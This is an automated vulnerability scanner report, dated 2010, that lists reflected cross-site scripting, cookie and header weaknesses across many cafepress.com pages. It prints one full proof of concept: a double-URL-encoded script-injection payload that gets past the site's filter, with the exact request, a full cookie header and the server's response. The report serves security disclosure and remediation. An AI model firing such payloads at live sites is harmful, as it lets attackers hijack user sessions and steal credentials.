cafepress.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86 Cross Site Scripting in cafepress.com | Vulnerability Crawler Report Report generated by XSS.CX at Mon Dec 27 10:38:41 CST 2010.
Contents
1. Cross-site scripting (reflected)
1.1. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 [REST URL parameter 1]
1.2. http://www.cafepress.com/ [cp-v cookie]
1.3. http://www.cafepress.com/ [cp_st cookie]
1.4. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 [cp-v cookie]
1.5. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 [cp_st cookie]
1.6. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536 [cp-v cookie]
1.7. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536 [cp_st cookie]
1.8. http://www.cafepress.com/+aprons [cp-v cookie]
1.9. http://www.cafepress.com/+aprons [cp_st cookie]
1.10. http://www.cafepress.com/+baby-blanket [cp-v cookie]
1.11. http://www.cafepress.com/+baby-blanket [cp_st cookie]
1.12. http://www.cafepress.com/+baby-bodysuits [cp-v cookie]
1.13. http://www.cafepress.com/+baby-bodysuits [cp_st cookie]
1.14. http://www.cafepress.com/+baby-hat [cp-v cookie]
1.15. http://www.cafepress.com/+baby-hat [cp_st cookie]
1.16. http://www.cafepress.com/+bags [cp-v cookie]
1.17. http://www.cafepress.com/+bags [cp_st cookie]
1.18. http://www.cafepress.com/+boxers [cp-v cookie]
1.19. http://www.cafepress.com/+boxers [cp_st cookie]
1.20. http://www.cafepress.com/+bumper-stickers [cp-v cookie]
1.21. http://www.cafepress.com/+bumper-stickers [cp_st cookie]
1.22. http://www.cafepress.com/+buttons [cp-v cookie]
1.23. http://www.cafepress.com/+buttons [cp_st cookie]
1.24. http://www.cafepress.com/+calendars [cp-v cookie]
1.25. http://www.cafepress.com/+calendars [cp_st cookie]
1.26. http://www.cafepress.com/+clocks [cp-v cookie]
1.27. http://www.cafepress.com/+clocks [cp_st cookie]
1.28. http://www.cafepress.com/+coasters [cp-v cookie]
1.29. http://www.cafepress.com/+coasters [cp_st cookie]
1.30. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536 [cp-v cookie]
1.31. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536 [cp_st cookie]
1.32. http://www.cafepress.com/+framed-prints [cp-v cookie]
1.33. http://www.cafepress.com/+framed-prints [cp_st cookie]
1.34. http://www.cafepress.com/+greeting_cards [cp-v cookie]
1.35. http://www.cafepress.com/+greeting_cards [cp_st cookie]
1.36. http://www.cafepress.com/+hats-caps [cp-v cookie]
1.37. http://www.cafepress.com/+hats-caps [cp_st cookie]
1.38. http://www.cafepress.com/+ipad-cases [cp-v cookie]
1.39. http://www.cafepress.com/+ipad-cases [cp_st cookie]
1.40. http://www.cafepress.com/+iphone-cases [cp-v cookie]
1.41. http://www.cafepress.com/+iphone-cases [cp_st cookie]
1.42. http://www.cafepress.com/+journals [cp-v cookie]
1.43. http://www.cafepress.com/+journals [cp_st cookie]
1.44. http://www.cafepress.com/+keepsake_boxes [cp-v cookie]
1.45. http://www.cafepress.com/+keepsake_boxes [cp_st cookie]
1.46. http://www.cafepress.com/+license_plate_frames [cp-v cookie]
1.47. http://www.cafepress.com/+license_plate_frames [cp_st cookie]
1.48. http://www.cafepress.com/+magnets [cp-v cookie]
1.49. http://www.cafepress.com/+magnets [cp_st cookie]
1.50. http://www.cafepress.com/+mousepads [cp-v cookie]
1.51. http://www.cafepress.com/+mousepads [cp_st cookie]
1.52. http://www.cafepress.com/+mugs [cp-v cookie]
1.53. http://www.cafepress.com/+mugs [cp_st cookie]
1.54. http://www.cafepress.com/+ornaments [cp-v cookie]
1.55. http://www.cafepress.com/+ornaments [cp_st cookie]
1.56. http://www.cafepress.com/+posters [cp-v cookie]
1.57. http://www.cafepress.com/+posters [cp_st cookie]
1.58. http://www.cafepress.com/+stadium-blanket [cp-v cookie]
1.59. http://www.cafepress.com/+stadium-blanket [cp_st cookie]
1.60. http://www.cafepress.com/+steins [cp-v cookie]
1.61. http://www.cafepress.com/+steins [cp_st cookie]
1.62. http://www.cafepress.com/+stocking [cp-v cookie]
1.63. http://www.cafepress.com/+stocking [cp_st cookie]
1.64. http://www.cafepress.com/+sweatshirts-hoodies [cp-v cookie]
1.65. http://www.cafepress.com/+sweatshirts-hoodies [cp_st cookie]
1.66. http://www.cafepress.com/+thermos [cp-v cookie]
1.67. http://www.cafepress.com/+thermos [cp_st cookie]
1.68. http://www.cafepress.com/+underwear-panties [cp-v cookie]
1.69. http://www.cafepress.com/+underwear-panties [cp_st cookie]
1.70. http://www.cafepress.com/+water-bottles [cp-v cookie]
1.71. http://www.cafepress.com/+water-bottles [cp_st cookie]
1.72. http://www.cafepress.com/+womens-tank-tops [cp-v cookie]
1.73. http://www.cafepress.com/+womens-tank-tops [cp_st cookie]
1.74. http://www.cafepress.com/+womens-thongs [cp-v cookie]
1.75. http://www.cafepress.com/+womens-thongs [cp_st cookie]
1.76. http://www.cafepress.com/+yoga-mats [cp-v cookie]
1.77. http://www.cafepress.com/+yoga-mats [cp_st cookie]
1.78. http://www.cafepress.com/TheGamingApe [cp-v cookie]
1.79. http://www.cafepress.com/TheGamingApe [cp_st cookie]
1.80. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx [cp-v cookie]
1.81. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx [cp_st cookie]
1.82. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx [cp-v cookie]
1.83. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx [cp_st cookie]
1.84. http://www.cafepress.com/cp/info/about/ [cp-v cookie]
1.85. http://www.cafepress.com/cp/info/about/ [cp_st cookie]
1.86. http://www.cafepress.com/cp/info/help/index.aspx [cp-v cookie]
1.87. http://www.cafepress.com/cp/info/help/index.aspx [cp_st cookie]
1.88. http://www.cafepress.com/cp/info/help/tos.aspx [cp-v cookie]
1.89. http://www.cafepress.com/cp/info/help/tos.aspx [cp_st cookie]
1.90. http://www.cafepress.com/cp/info/sell/index.aspx [cp-v cookie]
1.91. http://www.cafepress.com/cp/info/sell/index.aspx [cp_st cookie]
1.92. http://www.cafepress.com/cp/sitemap/ [cp-v cookie]
1.93. http://www.cafepress.com/cp/sitemap/ [cp_st cookie]
1.94. http://www.cafepress.com/cp/viewcart.aspx [cp-v cookie]
1.95. http://www.cafepress.com/cp/viewcart.aspx [cp_st cookie]
1.96. http://www.cafepress.com/make/birth-announcements [cp-v cookie]
1.97. http://www.cafepress.com/make/birth-announcements [cp_st cookie]
1.98. http://www.cafepress.com/make/custom-baby-gear [cp-v cookie]
1.99. http://www.cafepress.com/make/custom-baby-gear [cp_st cookie]
1.100. http://www.cafepress.com/make/custom-buttons [cp-v cookie]
1.101. http://www.cafepress.com/make/custom-buttons [cp_st cookie]
1.102. http://www.cafepress.com/make/custom-hats [cp-v cookie]
1.103. http://www.cafepress.com/make/custom-hats [cp_st cookie]
1.104. http://www.cafepress.com/make/custom-hoodies-sweatshirts [cp-v cookie]
1.105. http://www.cafepress.com/make/custom-hoodies-sweatshirts [cp_st cookie]
1.106. http://www.cafepress.com/make/custom-ipad-case [cp-v cookie]
1.107. http://www.cafepress.com/make/custom-ipad-case [cp_st cookie]
1.108. http://www.cafepress.com/make/custom-iphone-cases [cp-v cookie]
1.109. http://www.cafepress.com/make/custom-iphone-cases [cp_st cookie]
1.110. http://www.cafepress.com/make/custom-mugs [cp-v cookie]
1.111. http://www.cafepress.com/make/custom-mugs [cp_st cookie]
1.112. http://www.cafepress.com/make/custom-stickers [cp-v cookie]
1.113. http://www.cafepress.com/make/custom-stickers [cp_st cookie]
1.114. http://www.cafepress.com/make/custom-stockings [cp-v cookie]
1.115. http://www.cafepress.com/make/custom-stockings [cp_st cookie]
1.116. http://www.cafepress.com/make/custom-t-shirts [cp-v cookie]
1.117. http://www.cafepress.com/make/custom-t-shirts [cp_st cookie]
1.118. http://www.cafepress.com/make/custom-thermos [cp-v cookie]
1.119. http://www.cafepress.com/make/custom-thermos [cp_st cookie]
1.120. http://www.cafepress.com/make/custom-water-bottles [cp-v cookie]
1.121. http://www.cafepress.com/make/custom-water-bottles [cp_st cookie]
1.122. http://www.cafepress.com/make/holiday-invitations [cp-v cookie]
1.123. http://www.cafepress.com/make/holiday-invitations [cp_st cookie]
1.124. http://www.cafepress.com/make/holiday-photo-cards [cp-v cookie]
1.125. http://www.cafepress.com/make/holiday-photo-cards [cp_st cookie]
1.126. http://www.cafepress.com/make/personalized-gifts [cp-v cookie]
1.127. http://www.cafepress.com/make/personalized-gifts [cp_st cookie]
1.128. http://www.cafepress.com/make/personalized-ornaments [cp-v cookie]
1.129. http://www.cafepress.com/make/personalized-ornaments [cp_st cookie]
1.130. http://www.cafepress.com/make/photo-on-canvas [cp-v cookie]
1.131. http://www.cafepress.com/make/photo-on-canvas [cp_st cookie]
1.132. http://www.cafepress.com/sk/TheGamingApe [cp-v cookie]
1.133. http://www.cafepress.com/sk/TheGamingApe [cp_st cookie]
2. Cookie scoped to parent domain
2.1. http://www.cafepress.com/
2.2. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536
2.3. http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144
2.4. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
2.5. http://www.cafepress.com/+aprons
2.6. http://www.cafepress.com/+baby-blanket
2.7. http://www.cafepress.com/+baby-bodysuits
2.8. http://www.cafepress.com/+baby-hat
2.9. http://www.cafepress.com/+bags
2.10. http://www.cafepress.com/+boxers
2.11. http://www.cafepress.com/+bumper-stickers
2.12. http://www.cafepress.com/+buttons
2.13. http://www.cafepress.com/+calendars
2.14. http://www.cafepress.com/+clocks
2.15. http://www.cafepress.com/+coasters
2.16. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536
2.17. http://www.cafepress.com/+framed-prints
2.18. http://www.cafepress.com/+greeting_cards
2.19. http://www.cafepress.com/+hats-caps
2.20. http://www.cafepress.com/+ipad-cases
2.21. http://www.cafepress.com/+iphone-cases
2.22. http://www.cafepress.com/+journals
2.23. http://www.cafepress.com/+keepsake_boxes
2.24. http://www.cafepress.com/+license_plate_frames
2.25. http://www.cafepress.com/+magnets
2.26. http://www.cafepress.com/+mousepads
2.27. http://www.cafepress.com/+mugs
2.28. http://www.cafepress.com/+ornaments
2.29. http://www.cafepress.com/+posters
2.30. http://www.cafepress.com/+stadium-blanket
2.31. http://www.cafepress.com/+steins
2.32. http://www.cafepress.com/+stocking
2.33. http://www.cafepress.com/+sweatshirts-hoodies
2.34. http://www.cafepress.com/+thermos
2.35. http://www.cafepress.com/+underwear-panties
2.36. http://www.cafepress.com/+water-bottles
2.37. http://www.cafepress.com/+womens-tank-tops
2.38. http://www.cafepress.com/+womens-thongs
2.39. http://www.cafepress.com/+yoga-mats
2.40. http://www.cafepress.com/TheGamingApe
2.41. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx
2.42. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx
2.43. http://www.cafepress.com/cp/info/about/
2.44. http://www.cafepress.com/cp/info/help/
2.45. http://www.cafepress.com/cp/info/help/index.aspx
2.46. http://www.cafepress.com/cp/info/sell/index.aspx
2.47. http://www.cafepress.com/cp/moredetails.aspx
2.48. http://www.cafepress.com/cp/products/
2.49. http://www.cafepress.com/cp/sitemap/
2.50. http://www.cafepress.com/cp/tags/
2.51. http://www.cafepress.com/cp/viewcart.aspx
2.52. http://www.cafepress.com/make/birth-announcements
2.53. http://www.cafepress.com/make/custom-baby-gear
2.54. http://www.cafepress.com/make/custom-buttons
2.55. http://www.cafepress.com/make/custom-hats
2.56. http://www.cafepress.com/make/custom-hoodies-sweatshirts
2.57. http://www.cafepress.com/make/custom-ipad-case
2.58. http://www.cafepress.com/make/custom-iphone-cases
2.59. http://www.cafepress.com/make/custom-mugs
2.60. http://www.cafepress.com/make/custom-stickers
2.61. http://www.cafepress.com/make/custom-stockings
2.62. http://www.cafepress.com/make/custom-t-shirts
2.63. http://www.cafepress.com/make/custom-thermos
2.64. http://www.cafepress.com/make/custom-water-bottles
2.65. http://www.cafepress.com/make/holiday-invitations
2.66. http://www.cafepress.com/make/holiday-photo-cards
2.67. http://www.cafepress.com/make/makeacard.aspx
2.68. http://www.cafepress.com/make/personalized-gifts
2.69. http://www.cafepress.com/make/personalized-ornaments
2.70. http://www.cafepress.com/sk/TheGamingApe
3. Cookie without HttpOnly flag set
3.1. http://www.cafepress.com/
3.2. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536
3.3. http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144
3.4. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
3.5. http://www.cafepress.com/+aprons
3.6. http://www.cafepress.com/+baby-blanket
3.7. http://www.cafepress.com/+baby-bodysuits
3.8. http://www.cafepress.com/+baby-hat
3.9. http://www.cafepress.com/+bags
3.10. http://www.cafepress.com/+boxers
3.11. http://www.cafepress.com/+bumper-stickers
3.12. http://www.cafepress.com/+buttons
3.13. http://www.cafepress.com/+calendars
3.14. http://www.cafepress.com/+clocks
3.15. http://www.cafepress.com/+coasters
3.16. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536
3.17. http://www.cafepress.com/+framed-prints
3.18. http://www.cafepress.com/+greeting_cards
3.19. http://www.cafepress.com/+hats-caps
3.20. http://www.cafepress.com/+ipad-cases
3.21. http://www.cafepress.com/+iphone-cases
3.22. http://www.cafepress.com/+journals
3.23. http://www.cafepress.com/+keepsake_boxes
3.24. http://www.cafepress.com/+license_plate_frames
3.25. http://www.cafepress.com/+magnets
3.26. http://www.cafepress.com/+mousepads
3.27. http://www.cafepress.com/+mugs
3.28. http://www.cafepress.com/+ornaments
3.29. http://www.cafepress.com/+posters
3.30. http://www.cafepress.com/+stadium-blanket
3.31. http://www.cafepress.com/+steins
3.32. http://www.cafepress.com/+stocking
3.33. http://www.cafepress.com/+sweatshirts-hoodies
3.34. http://www.cafepress.com/+thermos
3.35. http://www.cafepress.com/+underwear-panties
3.36. http://www.cafepress.com/+water-bottles
3.37. http://www.cafepress.com/+womens-tank-tops
3.38. http://www.cafepress.com/+womens-thongs
3.39. http://www.cafepress.com/+yoga-mats
3.40. http://www.cafepress.com/1/1/index1.html
3.41. http://www.cafepress.com/1/1/indexd1.html
3.42. http://www.cafepress.com/1/3/index1.html
3.43. http://www.cafepress.com/1/3/indexb1.html
3.44. http://www.cafepress.com/1/3/indexc1.html
3.45. http://www.cafepress.com/TheGamingApe
3.46. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx
3.47. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx
3.48. http://www.cafepress.com/cp/info/about/
3.49. http://www.cafepress.com/cp/info/help/
3.50. http://www.cafepress.com/cp/info/help/index.aspx
3.51. http://www.cafepress.com/cp/info/sell/index.aspx
3.52. http://www.cafepress.com/cp/moredetails.aspx
3.53. http://www.cafepress.com/cp/products/
3.54. http://www.cafepress.com/cp/sitemap/
3.55. http://www.cafepress.com/cp/tags/
3.56. http://www.cafepress.com/cp/viewcart.aspx
3.57. http://www.cafepress.com/make/birth-announcements
3.58. http://www.cafepress.com/make/custom-baby-gear
3.59. http://www.cafepress.com/make/custom-buttons
3.60. http://www.cafepress.com/make/custom-hats
3.61. http://www.cafepress.com/make/custom-hoodies-sweatshirts
3.62. http://www.cafepress.com/make/custom-ipad-case
3.63. http://www.cafepress.com/make/custom-iphone-cases
3.64. http://www.cafepress.com/make/custom-mugs
3.65. http://www.cafepress.com/make/custom-stickers
3.66. http://www.cafepress.com/make/custom-stockings
3.67. http://www.cafepress.com/make/custom-t-shirts
3.68. http://www.cafepress.com/make/custom-thermos
3.69. http://www.cafepress.com/make/custom-water-bottles
3.70. http://www.cafepress.com/make/holiday-invitations
3.71. http://www.cafepress.com/make/holiday-photo-cards
3.72. http://www.cafepress.com/make/makeacard.aspx
3.73. http://www.cafepress.com/make/personalized-gifts
3.74. http://www.cafepress.com/make/personalized-ornaments
3.75. http://www.cafepress.com/sk/TheGamingApe
3.76. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
4. Cross-domain Referer leakage
4.1. http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144
4.2. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
4.3. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
4.4. http://www.cafepress.com/cp/info/help/index.aspx
4.5. http://www.cafepress.com/cp/info/sell/index.aspx
4.6. http://www.cafepress.com/cp/moredetails.aspx
4.7. http://www.cafepress.com/cp/viewcart.aspx
5. Cross-domain script include
5.1. http://www.cafepress.com/
5.2. http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144
5.3. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
5.4. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
5.5. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
5.6. http://www.cafepress.com/+aprons
5.7. http://www.cafepress.com/+baby-blanket
5.8. http://www.cafepress.com/+baby-bodysuits
5.9. http://www.cafepress.com/+baby-hat
5.10. http://www.cafepress.com/+bags
5.11. http://www.cafepress.com/+boxers
5.12. http://www.cafepress.com/+bumper-stickers
5.13. http://www.cafepress.com/+buttons
5.14. http://www.cafepress.com/+calendars
5.15. http://www.cafepress.com/+clocks
5.16. http://www.cafepress.com/+coasters
5.17. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536
5.18. http://www.cafepress.com/+framed-prints
5.19. http://www.cafepress.com/+greeting_cards
5.20. http://www.cafepress.com/+hats-caps
5.21. http://www.cafepress.com/+ipad-cases
5.22. http://www.cafepress.com/+iphone-cases
5.23. http://www.cafepress.com/+journals
5.24. http://www.cafepress.com/+keepsake_boxes
5.25. http://www.cafepress.com/+license_plate_frames
5.26. http://www.cafepress.com/+magnets
5.27. http://www.cafepress.com/+mousepads
5.28. http://www.cafepress.com/+mugs
5.29. http://www.cafepress.com/+ornaments
5.30. http://www.cafepress.com/+posters
5.31. http://www.cafepress.com/+stadium-blanket
5.32. http://www.cafepress.com/+steins
5.33. http://www.cafepress.com/+stocking
5.34. http://www.cafepress.com/+sweatshirts-hoodies
5.35. http://www.cafepress.com/+thermos
5.36. http://www.cafepress.com/+underwear-panties
5.37. http://www.cafepress.com/+water-bottles
5.38. http://www.cafepress.com/+womens-tank-tops
5.39. http://www.cafepress.com/+womens-thongs
5.40. http://www.cafepress.com/+yoga-mats
5.41. http://www.cafepress.com/1/1/index1.html
5.42. http://www.cafepress.com/1/1/indexd1.html
5.43. http://www.cafepress.com/1/3/index1.html
5.44. http://www.cafepress.com/1/3/indexb1.html
5.45. http://www.cafepress.com/1/3/indexc1.html
5.46. http://www.cafepress.com/cp/info/about/
5.47. http://www.cafepress.com/cp/info/help/index.aspx
5.48. http://www.cafepress.com/cp/info/sell/index.aspx
5.49. http://www.cafepress.com/cp/moredetails.aspx
5.50. http://www.cafepress.com/cp/sitemap/
5.51. http://www.cafepress.com/cp/viewcart.aspx
5.52. http://www.cafepress.com/cp/viewcart.aspx
5.53. http://www.cafepress.com/make/birth-announcements
5.54. http://www.cafepress.com/make/custom-baby-gear
5.55. http://www.cafepress.com/make/custom-buttons
5.56. http://www.cafepress.com/make/custom-hats
5.57. http://www.cafepress.com/make/custom-hoodies-sweatshirts
5.58. http://www.cafepress.com/make/custom-ipad-case
5.59. http://www.cafepress.com/make/custom-iphone-cases
5.60. http://www.cafepress.com/make/custom-mugs
5.61. http://www.cafepress.com/make/custom-stickers
5.62. http://www.cafepress.com/make/custom-stockings
5.63. http://www.cafepress.com/make/custom-t-shirts
5.64. http://www.cafepress.com/make/custom-thermos
5.65. http://www.cafepress.com/make/custom-water-bottles
5.66. http://www.cafepress.com/make/holiday-invitations
5.67. http://www.cafepress.com/make/holiday-photo-cards
5.68. http://www.cafepress.com/make/personalized-gifts
5.69. http://www.cafepress.com/make/personalized-ornaments
5.70. http://www.cafepress.com/sk/TheGamingApe
6. Email addresses disclosed
6.1. http://www.cafepress.com/TheGamingApe
6.2. http://www.cafepress.com/make/custom-baby-gear
6.3. http://www.cafepress.com/make/custom-buttons
6.4. http://www.cafepress.com/make/custom-ipad-case
6.5. http://www.cafepress.com/make/custom-iphone-cases
6.6. http://www.cafepress.com/make/custom-stickers
6.7. http://www.cafepress.com/make/custom-stockings
6.8. http://www.cafepress.com/make/custom-thermos
6.9. http://www.cafepress.com/make/custom-water-bottles
6.10. http://www.cafepress.com/make/personalized-gifts
6.11. http://www.cafepress.com/make/personalized-ornaments
7. HTML does not specify charset
8. Content type incorrectly stated
1. Cross-site scripting (reflected)
There are 133 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk.
Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 [REST URL parameter 1]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ebb4%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf6f6b5b741 was submitted in the REST URL parameter 1. This input was echoed as 2ebb4</script><script>alert(1)</script>df6f6b5b741 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /%20Eat%20Sleep%20Game%20Light%20T-Shirt,2990075362ebb4%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf6f6b5b741 ?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
ntCoent-Length: 43454
Date: Sun, 26 Dec 2010 13:47:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054713%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:47:13 GMT; path=/
Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226054713%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:47:13 GMT; path=/
Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:47:13 GMT; path=/
Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:47:13 GMT; path=/
Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:47:13 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 43454

